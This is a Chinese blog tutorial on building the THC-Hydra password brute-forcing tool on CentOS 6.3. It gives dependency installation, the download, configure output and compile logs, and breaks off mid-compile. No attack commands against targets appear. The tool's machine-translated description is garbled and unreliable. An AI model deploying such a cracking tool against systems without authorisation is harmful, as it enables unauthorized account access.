首先还是书写本文的
参考档:http://www.cnblogs.com/mchina/archive/2013/01/01/2840815.html
工具介绍:原文为官方英文解释本人给翻译下
数量最大的安全漏洞之一是密码,每个密码安全研究显示。 Hydra是一个parallized登录的裂解装置,它支持众多的协议来攻击。新的模块很容易的添加,旁边,它是灵活的,而且速度非常快。
水润测试上编译的Linux,Windows/ Cygwin的中,Solaris 11中的FreeBSD8.1和OSX,可根据GPLv3的一个特殊的OpenSSL许可证授权扩展。
目前该工具支持:
AFP,使思科,思科认证,思科AAA,CVS,火鸟,FTP,HTTP-FORM-GET,HTTP-FORM-POST,HTTP-GET,HTTP头,HTTP代理,HTTPS-FORM-GET,HTTPS-FORM POST,IMAP,HTTP代理,HTTPS的GET,HTTPS头,ICQ,IRC,LDAP,MS-SQL,MYSQL,NCP,NNTP,Oracle的监听器,Oracle的SID,甲骨文,PCAnywhere中,PCNFS,POP3,POSTGRES,RDP,REXEC,Rlogin的,RSH,SAP/R3,SIP,SMB,SMTP,SNMP,SMTP枚举,SOCKS5,SSH(v1和v2),颠覆,使用TeamSpeak(TS2),远程登录,VMware的认证,VNC和XMPP。
对于HTTP,POP3,IMAP和SMTP,支持几个登录机制,如平原和MD5摘要等。
这个工具是一个概念证明代码,给研究人员和安全顾问可行显示,这将是多么容易获得未经授权的访问从远程系统。
面包车豪斯和大卫Maciejak的维护程序。
黑客选择
http://www.thc.org/thc-hydra
本人的实验环境借用了 centos6.3 这里注明下本人刚接触Linux是RHEL也就是RedHad的企业版本。了解CentOS后知道centos为rhel的克隆版理论是兼容rhel的所有包的
所以该下演示的步骤和包同样可用在rhel的OS上。假如你的服务器是RHEL的但为激活使用yum可以参考本人博客的博文 RHEL使用centos的yum源修改教程:http://www.cnblogs.com/patf/articles/3137348.html
废话不多说首先安装的是hydra的支持库包软件
1 yum -y install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel libncurses-devel
假如-y选项,因为本人在安装的时候 没有加入所以有两三次提示我 -y可以默认yes
1 Verifying : subversion-devel-1.6.11-9.el6_4.i686 26/59 2 Verifying : db4-cxx-4.7.25-17.el6.i686 27/59 3 Verifying : postgresql-libs-8.4.13-1.el6_3.i686 28/59 4 Verifying : openldap-devel-2.4.23-32.el6_4.1.i686 29/59 5 Verifying : cyrus-sasl-plain-2.1.23-13.el6_3.1.i686 30/59 6 Verifying : openldap-2.4.23-32.el6_4.1.i686 31/59 7 Verifying : krb5-workstation-1.10.3-10.el6_4.3.i686 32/59 8 Verifying : cyrus-sasl-lib-2.1.23-13.el6_3.1.i686 33/59 9 Verifying : postgresql-devel-8.4.13-1.el6_3.i686 34/59 10 Verifying : expat-devel-2.0.1-11.el6_2.i686 35/59 11 Verifying : libcom_err-devel-1.41.12-14.el6.i686 36/59 12 Verifying : krb5-devel-1.10.3-10.el6_4.3.i686 37/59 13 Verifying : krb5-libs-1.10.3-10.el6_4.3.i686 38/59 14 Verifying : cyrus-sasl-2.1.23-13.el6_3.1.i686 39/59 15 Verifying : cyrus-sasl-lib-2.1.23-13.el6.i686 40/59 16 Verifying : cyrus-sasl-2.1.23-13.el6.i686 41/59 17 Verifying : libss-1.41.12-12.el6.i686 42/59 18 Verifying : openssl-1.0.0-20.el6_2.5.i686 43/59 19 Verifying : subversion-1.6.11-7.el6.i686 44/59 20 Verifying : cyrus-sasl-gssapi-2.1.23-13.el6.i686 45/59 21 Verifying : e2fsprogs-1.41.12-12.el6.i686 46/59 22 Verifying : openldap-2.4.23-26.el6.i686 47/59 23 Verifying : libcom_err-1.41.12-12.el6.i686 48/59 24 Verifying : zlib-1.2.3-27.el6.i686 49/59 25 Verifying : pcre-7.8-4.el6.i686 50/59 26 Verifying : libselinux-2.0.94-5.3.el6.i686 51/59 27 Verifying : cyrus-sasl-plain-2.1.23-13.el6.i686 52/59 28 Verifying : libselinux-utils-2.0.94-5.3.el6.i686 53/59 29 Verifying : libselinux-python-2.0.94-5.3.el6.i686 54/59 30 Verifying : krb5-workstation-1.9-33.el6.i686 55/59 31 Verifying : krb5-libs-1.9-33.el6.i686 56/59 32 Verifying : e2fsprogs-libs-1.41.12-12.el6.i686 57/59 33 Verifying : apr-1.3.9-3.el6_1.2.i686 58/59 34 Verifying : cyrus-sasl-md5-2.1.23-13.el6.i686 59/59 35 36 Installed: 37 openssl-devel.i686 0:1.0.0-27.el6_4.2 pcre-devel.i686 0:7.8-6.el6 38 postgresql-devel.i686 0:8.4.13-1.el6_3 subversion-devel.i686 0:1.6.11-9.el6_4 39 40 Dependency Installed: 41 apr-devel.i686 0:1.3.9-5.el6_2 apr-util-devel.i686 0:1.3.9-3.el6_0.1 42 cyrus-sasl-devel.i686 0:2.1.23-13.el6_3.1 db4-cxx.i686 0:4.7.25-17.el6 43 db4-devel.i686 0:4.7.25-17.el6 expat-devel.i686 0:2.0.1-11.el6_2 44 keyutils-libs-devel.i686 0:1.4-4.el6 krb5-devel.i686 0:1.10.3-10.el6_4.3 45 libcom_err-devel.i686 0:1.41.12-14.el6 libselinux-devel.i686 0:2.0.94-5.3.el6_4.1 46 libsepol-devel.i686 0:2.0.41-4.el6 openldap-devel.i686 0:2.4.23-32.el6_4.1 47 postgresql.i686 0:8.4.13-1.el6_3 postgresql-libs.i686 0:8.4.13-1.el6_3 48 zlib-devel.i686 0:1.2.3-29.el6 49 50 Dependency Updated: 51 apr.i686 0:1.3.9-5.el6_2 cyrus-sasl.i686 0:2.1.23-13.el6_3.1 52 cyrus-sasl-gssapi.i686 0:2.1.23-13.el6_3.1 cyrus-sasl-lib.i686 0:2.1.23-13.el6_3.1 53 cyrus-sasl-md5.i686 0:2.1.23-13.el6_3.1 cyrus-sasl-plain.i686 0:2.1.23-13.el6_3.1 54 e2fsprogs.i686 0:1.41.12-14.el6 e2fsprogs-libs.i686 0:1.41.12-14.el6 55 krb5-libs.i686 0:1.10.3-10.el6_4.3 krb5-workstation.i686 0:1.10.3-10.el6_4.3 56 libcom_err.i686 0:1.41.12-14.el6 libselinux.i686 0:2.0.94-5.3.el6_4.1 57 libselinux-python.i686 0:2.0.94-5.3.el6_4.1 libselinux-utils.i686 0:2.0.94-5.3.el6_4.1 58 libss.i686 0:1.41.12-14.el6 openldap.i686 0:2.4.23-32.el6_4.1 59 openssl.i686 0:1.0.0-27.el6_4.2 pcre.i686 0:7.8-6.el6 60 subversion.i686 0:1.6.11-9.el6_4 zlib.i686 0:1.2.3-29.el6 61 62 Complete!
到这里所以支持都安装完毕下面可以安装hydra了
可以到官方找最新的包也可以按一下的方法下载
1 root@localhost ~]# wget http://www.thc.org/releases/hydra-7.4.1.tar.gz 2 --2013-06-18 23:02:32-- http://www.thc.org/releases/hydra-7.4.1.tar.gz 3 正在解析主机 www.thc.org... 199.58.210.16 4 正在连接 www.thc.org|199.58.210.16|:80... 已连接。 5 已发出 HTTP 请求,正在等待回应... 200 OK 6 长度:666187 (651K) [application/x-gzip] 7 正在保存至: “hydra-7.4.1.tar.gz” 8 9 17% [==================> ] 114,105 35.6K/s eta(英国中部时19% [=====================> ] 131,481 38.3K/s eta(英国中部时23% [=========================> ] 154,649 41.7K/s eta(英国中部时28% [===============================> ] 190,849 47.6K/s eta(英国中部时34% [======================================> ] 227,049 53.7K/s eta(英国中部时36% [=========================================> ] 244,425 55.1K/s eta(英国中部时41% [==============================================> ] 273,385 58.6K/s eta(英国中部时46% [====================================================> ] 309,585 63.2K/s eta(英国中部时48% [======================================================> ] 322,617 62.4K/s eta(英国中部时53% [============================================================> ] 357,825 69.5K/s eta(英国中部时57% [=================================================================> ] 384,881 73.0K/s eta(英国中部时61% [=====================================================================> ] 406,601 83.8K/s eta(英国中部时62% [======================================================================> ] 415,289 82.7K/s eta(英国中部时71% [================================================================================> ] 473,209 95.3K/s eta(英国中部时74% [====================================================================================> ] 494,929 99.8K/s eta(英国中部时77% [=======================================================================================> ] 515,201 96.8K/s eta(英国中部时83% [===============================================================================================> ] 557,193 104K/s eta(英国中部时86% [==================================================================================================> ] 577,465 104K/s eta(英国中部时89% [=====================================================================================================> ] 594,841 95.4K/s eta(英国中部时94% [===========================================================================================================> ] 631,041 99.9K/s eta(英国中部时97% [===============================================================================================================> ] 651,313 98.4K/s eta(英国中部时100%[==================================================================================================================>] 666,187 94.0K/s in 8.6s 10 11 2013-06-18 23:02:41 (75.8 KB/s) - 已保存 “hydra-7.4.1.tar.gz” [666187/666187]) 12 13 [root@localhost ~]# tar zxvf hydra-7.4.1.tar.gz 14 hydra-7.4.2/ 15 hydra-7.4.2/bfg.c 16 hydra-7.4.2/bfg.h 17 hydra-7.4.2/CHANGES 18 hydra-7.4.2/configure 19 hydra-7.4.2/crc32.c 20 hydra-7.4.2/crc32.h 21 hydra-7.4.2/d3des.c 22 hydra-7.4.2/d3des.h 23 hydra-7.4.2/dpl4hydra.sh 24 hydra-7.4.2/dpl4hydra_full.csv 25 hydra-7.4.2/dpl4hydra_local.csv 26 hydra-7.4.2/hmacmd5.c 27 hydra-7.4.2/hmacmd5.h 28 hydra-7.4.2/hydra-afp.c 29 hydra-7.4.2/hydra-cisco-enable.c 30 hydra-7.4.2/hydra-cisco.c 31 hydra-7.4.2/hydra-cvs.c 32 hydra-7.4.2/hydra-firebird.c 33 hydra-7.4.2/hydra-ftp.c 34 hydra-7.4.2/hydra-gtk/ 35 hydra-7.4.2/hydra-gtk/acconfig.h 36 hydra-7.4.2/hydra-gtk/aclocal.m4 37 hydra-7.4.2/hydra-gtk/AUTHORS 38 hydra-7.4.2/hydra-gtk/autogen.sh 39 hydra-7.4.2/hydra-gtk/ChangeLog 40 hydra-7.4.2/hydra-gtk/config.h 41 hydra-7.4.2/hydra-gtk/config.h.in 42 hydra-7.4.2/hydra-gtk/configure 43 hydra-7.4.2/hydra-gtk/configure.in 44 hydra-7.4.2/hydra-gtk/COPYING 45 hydra-7.4.2/hydra-gtk/INSTALL 46 hydra-7.4.2/hydra-gtk/install-sh 47 hydra-7.4.2/hydra-gtk/Makefile.am 48 hydra-7.4.2/hydra-gtk/Makefile.in 49 hydra-7.4.2/hydra-gtk/make_xhydra.sh 50 hydra-7.4.2/hydra-gtk/missing 51 hydra-7.4.2/hydra-gtk/mkinstalldirs 52 hydra-7.4.2/hydra-gtk/NEWS 53 hydra-7.4.2/hydra-gtk/README 54 hydra-7.4.2/hydra-gtk/src/ 55 hydra-7.4.2/hydra-gtk/src/callbacks.c 56 hydra-7.4.2/hydra-gtk/src/callbacks.h 57 hydra-7.4.2/hydra-gtk/src/interface.c 58 hydra-7.4.2/hydra-gtk/src/interface.h 59 hydra-7.4.2/hydra-gtk/src/main.c 60 hydra-7.4.2/hydra-gtk/src/Makefile.am 61 hydra-7.4.2/hydra-gtk/src/Makefile.in 62 hydra-7.4.2/hydra-gtk/src/support.c 63 hydra-7.4.2/hydra-gtk/src/support.h 64 hydra-7.4.2/hydra-gtk/stamp-h.in 65 hydra-7.4.2/hydra-gtk/xhydra.glade 66 hydra-7.4.2/hydra-gtk/xhydra.gladep 67 hydra-7.4.2/hydra-http-form.c 68 hydra-7.4.2/hydra-http-proxy-urlenum.c 69 hydra-7.4.2/hydra-http-proxy.c 70 hydra-7.4.2/hydra-http.c 71 hydra-7.4.2/hydra-icq.c 72 hydra-7.4.2/hydra-imap.c 73 hydra-7.4.2/hydra-irc.c 74 hydra-7.4.2/hydra-ldap.c 75 hydra-7.4.2/hydra-logo.ico 76 hydra-7.4.2/hydra-logo.rc 77 hydra-7.4.2/hydra-mod.c 78 hydra-7.4.2/hydra-mod.h 79 hydra-7.4.2/hydra-mssql.c 80 hydra-7.4.2/hydra-mysql.c 81 hydra-7.4.2/hydra-ncp.c 82 hydra-7.4.2/hydra-nntp.c 83 hydra-7.4.2/hydra-oracle-listener.c 84 hydra-7.4.2/hydra-oracle-sid.c 85 hydra-7.4.2/hydra-oracle.c 86 hydra-7.4.2/hydra-pcanywhere.c 87 hydra-7.4.2/hydra-pcnfs.c 88 hydra-7.4.2/hydra-pop3.c 89 hydra-7.4.2/hydra-postgres.c 90 hydra-7.4.2/hydra-rdp.c 91 hydra-7.4.2/hydra-rexec.c 92 hydra-7.4.2/hydra-rlogin.c 93 hydra-7.4.2/hydra-rsh.c 94 hydra-7.4.2/hydra-sapr3.c 95 hydra-7.4.2/hydra-sip.c 96 hydra-7.4.2/hydra-smb.c 97 hydra-7.4.2/hydra-smtp-enum.c 98 hydra-7.4.2/hydra-smtp.c 99 hydra-7.4.2/hydra-snmp.c 100 hydra-7.4.2/hydra-socks5.c 101 hydra-7.4.2/hydra-ssh.c 102 hydra-7.4.2/hydra-sshkey.c 103 hydra-7.4.2/hydra-svn.c 104 hydra-7.4.2/hydra-teamspeak.c 105 hydra-7.4.2/hydra-telnet.c 106 hydra-7.4.2/hydra-vmauthd.c 107 hydra-7.4.2/hydra-vnc.c 108 hydra-7.4.2/hydra-xmpp.c 109 hydra-7.4.2/hydra.1 110 hydra-7.4.2/hydra.c 111 hydra-7.4.2/hydra.h 112 hydra-7.4.2/INSTALL 113 hydra-7.4.2/libpq-fe.h 114 hydra-7.4.2/LICENSE 115 hydra-7.4.2/LICENSE.OPENSSL 116 hydra-7.4.2/Makefile 117 hydra-7.4.2/Makefile.am 118 hydra-7.4.2/Makefile.orig 119 hydra-7.4.2/Makefile.unix 120 hydra-7.4.2/ntlm.c 121 hydra-7.4.2/ntlm.h 122 hydra-7.4.2/performance.h 123 hydra-7.4.2/postgres_ext.h 124 hydra-7.4.2/pw-inspector-logo.rc 125 hydra-7.4.2/pw-inspector.1 126 hydra-7.4.2/pw-inspector.c 127 hydra-7.4.2/pw-inspector.ico 128 hydra-7.4.2/rdp.h 129 hydra-7.4.2/README 130 hydra-7.4.2/sasl.c 131 hydra-7.4.2/sasl.h 132 hydra-7.4.2/xhydra.1 133 hydra-7.4.2/xhydra.png 134 [root@localhost ~]# cd hydra-7.4. 135 -bash: cd: hydra-7.4.: 没有那个文件或目录 136 [root@localhost ~]# cd hydra-7.4. 137 hydra-7.4.1.tar.gz hydra-7.4.2/ 138 [root@localhost ~]# cd hydra-7.4.2/
这里有点搞笑了,下载了一个7.4.1的包解压是4.2的源 呵呵不管了反正新的包是向下兼容的进入到里面./configure --help下查看下
也没什么直接./configure 然后无报错就直接 make &&make install 即可
1 root@localhost hydra-7.4.2]# ./configure 2 3 Starting hydra auto configuration ... 4 Detected 32 Bit Linux OS 5 6 Checking for openssl (libssl, libcrypto, ssl.h, sha.h) ... 7 ... found 8 Checking for idn (libidn.so) ... 9 ... NOT found, unicode logins and passwords will not be supported 10 Checking for curses (libcurses.so / term.h) ... 11 ... NOT found, color output disabled 12 Checking for pcre (libpcre.so, pcre.h) ... 13 ... found 14 Checking for Postgres (libpq.so, libpq-fe.h) ... 15 ... found 16 Checking for SVN (libsvn_client-1 libapr-1.so libaprutil-1.so) ... 17 ... found 18 Checking for firebird (libfbclient.so) ... 19 ... NOT found, module firebird disabled 20 Checking for MYSQL client (libmysqlclient.so, math.h) ... 21 ... NOT found, module Mysql will not support version > 4.x 22 Checking for AFP (libafpclient.so) ... 23 ... NOT found, module Apple Filing Protocol disabled - Apple sucks anyway 24 Checking for NCP (libncp.so / nwcalls.h) ... 25 ... NOT found, module NCP disabled 26 Checking for SAP/R3 (librfc/saprfc.h) ... 27 ... NOT found, module sapr3 disabled 28 Get it from http://www.sap.com/solutions/netweaver/linux/eval/index.asp 29 Checking for libssh (libssh/libssh.h) ... 30 ... NOT found, module ssh disabled 31 Get it from http://www.libssh.org 32 Checking for Oracle (libocci.so libclntsh.so / oci.h and libaio.so) ... 33 ... NOT found, module Oracle disabled 34 Get basic and sdk package from http://www.oracle.com/technetwork/database/features/instant-client/index.html 35 Checking for GUI req's (pkg-config, gtk+-2.0) ... 36 ... NOT found, optional anyway 37 38 Hydra will be installed into .../bin of: /usr/local 39 (change this by running ./configure --prefix=path) 40 41 Writing Makefile.in ... 42 now type "make" 43 [root@localhost hydra-7.4.2]# make && make install 44 gcc -I. -O3 -o pw-inspector pw-inspector.c 45 gcc -I. -O3 -c hydra-vnc.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 46 gcc -I. -O3 -c hydra-pcnfs.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 47 gcc -I. -O3 -c hydra-rexec.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 48 gcc -I. -O3 -c hydra-nntp.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 49 gcc -I. -O3 -c hydra-socks5.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 50 gcc -I. -O3 -c hydra-telnet.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 51 gcc -I. -O3 -c hydra-cisco.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 52 gcc -I. -O3 -c hydra-http.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 53 gcc -I. -O3 -c hydra-ftp.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 54 gcc -I. -O3 -c hydra-imap.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 55 gcc -I. -O3 -c hydra-pop3.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 56 gcc -I. -O3 -c hydra-smb.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 57 gcc -I. -O3 -c hydra-icq.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 58 gcc -I. -O3 -c hydra-cisco-enable.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 59 gcc -I. -O3 -c hydra-ldap.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 60 gcc -I. -O3 -c hydra-mysql.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 61 gcc -I. -O3 -c hydra-mssql.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 62 gcc -I. -O3 -c hydra-xmpp.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 63 gcc -I. -O3 -c hydra-http-proxy-urlenum.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 64 gcc -I. -O3 -c hydra-snmp.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 65 gcc -I. -O3 -c hydra-cvs.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 66 gcc -I. -O3 -c hydra-smtp.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 67 gcc -I. -O3 -c hydra-smtp-enum.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 68 gcc -I. -O3 -c hydra-sapr3.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 69 gcc -I. -O3 -c hydra-ssh.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 70 gcc -I. -O3 -c hydra-sshkey.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 71 gcc -I. -O3 -c hydra-teamspeak.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 72 gcc -I. -O3 -c hydra-postgres.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 73 gcc -I. -O3 -c hydra-rsh.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 74 gcc -I. -O3 -c hydra-rlogin.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 75 gcc -I. -O3 -c hydra-oracle-listener.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 76 gcc -I. -O3 -c hydra-svn.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 77 gcc -I. -O3 -c hydra-pcanywhere.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 78 gcc -I. -O3 -c hydra-sip.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 79 gcc -I. -O3 -c hydra-oracle-sid.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 80 gcc -I. -O3 -c hydra-oracle.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 81 gcc -I. -O3 -c hydra-vmauthd.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 82 gcc -I. -O3 -c hydra-firebird.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 83 gcc -I. -O3 -c hydra-afp.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 84 gcc -I. -O3 -c hydra-ncp.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 85 gcc -I. -O3 -c hydra-http-proxy.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 86 gcc -I. -O3 -c hydra-http-form.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 87 gcc -I. -O3 -c hydra-irc.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 88 gcc -I. -O3 -c hydra-rdp.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 89 gcc -I. -O3 -c crc32.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 90 gcc -I. -O3 -c d3des.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 91 gcc -I. -O3 -c bfg.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 92 gcc -I. -O3 -c ntlm.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 93 gcc -I. -O3 -c sasl.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 94 gcc -I. -O3 -c hmacmd5.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 95 gcc -I. -O3 -c hydra-mod.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 96 gcc -I. -O3 -lm -o hydra hydra.c hydra-vnc.o hydra-pcnfs.o hydra-rexec.o hydra-nntp.o hydra-socks5.o hydra-telnet.o hydra-cisco.o hydra-http.o hydra-ftp.o hydra-imap.o hydra-pop3.o hydra-smb.o hydra-icq.o hydra-cisco-enable.o hydra-ldap.o hydra-mysql.o hydra-mssql.o 